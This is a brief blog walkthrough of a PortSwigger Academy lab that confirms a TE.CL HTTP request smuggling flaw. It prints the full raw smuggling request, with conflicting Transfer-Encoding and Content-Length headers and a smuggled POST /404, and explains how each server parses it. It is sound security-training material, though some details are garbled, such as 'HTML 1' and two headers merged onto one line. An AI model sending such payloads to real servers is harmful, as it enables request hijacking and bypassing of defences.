PortSwigger Academy Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses

Jun Takemura · March 17, 2025

PortSwigger Academy Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses

Task

This lab involves a front-end and back-end server, and the back-end server doesn’t support chunked encoding.

To solve the lab, smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.

Solution

Send a request to Repeater. Change the protocol to HTML 1. Also change the request method. Turn off update content length. Show non-printable characters.

Craft a request to send:

POST / HTTP/1.1
Host: 0a12001c039286248178fc0f006300ee.web-security-academy.net
Content-Type: application/x-www-form-urlencoded Content-length: 4
Transfer-Encoding: chunked

5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

Here 5e is the chunk size from POST to x=1. Trailing double CRLF (Carriage Return and Line Feed) /r/n/r/n after 0 is very important here as it marks the termination of the chunk. Without it the server will return an error.

The frontend server sees Transfer-Encoding and processes the data until x=1. However, the backend server sees Content-Length: 4 and only processes until 5e. The rest of the request will be considered a different request. And since that request’s content length is 15, the backend server will wait for more data.

So sending this request twice lets the server returns 404.

Twitter, Facebook